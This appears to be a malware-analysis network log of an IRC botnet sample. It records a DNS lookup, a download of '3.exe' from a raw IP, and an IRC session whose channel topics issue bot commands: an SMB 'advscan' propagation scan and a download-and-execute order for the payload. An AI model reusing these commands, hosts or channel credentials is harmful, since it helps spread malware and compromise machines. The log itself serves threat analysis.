– DNS Queries:
Name Query Type Query Result Successful Protocol
mm.esskil99.info DNS_TYPE_A 72.8.146.39 1
– HTTP Conversations:
72.8.146.36:80 – [72.8.146.36]
Request: GET /3.exe
Response: 200 “OK”
– IRC Conversations:
72.8.146.39:17766
Nick: USA|907373
Username: uwerqh
Joined Channel: ##blast,##blast2 with Password fexa0fe
Channel Topic for Channel ##blast2: “.advscan asn1smb 50 2 0 -r”
Channel Topic for Channel ##blast: “.xa0d http://72.8.146.36/3.exe msd.exe 1”
Private Message to Channel ##blast: “[DOWNLOAD]: Downloaded 118.0 KB to msd.exe @ 59.0 KB/sec.”
Private Message to Channel ##blast: “[DOWNLOAD]: Downloading URL: http://72.8.146.36/3.exe to: msd.exe.”
Private Message to Channel ##blast2: “[SCAN]: Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 50 threads.”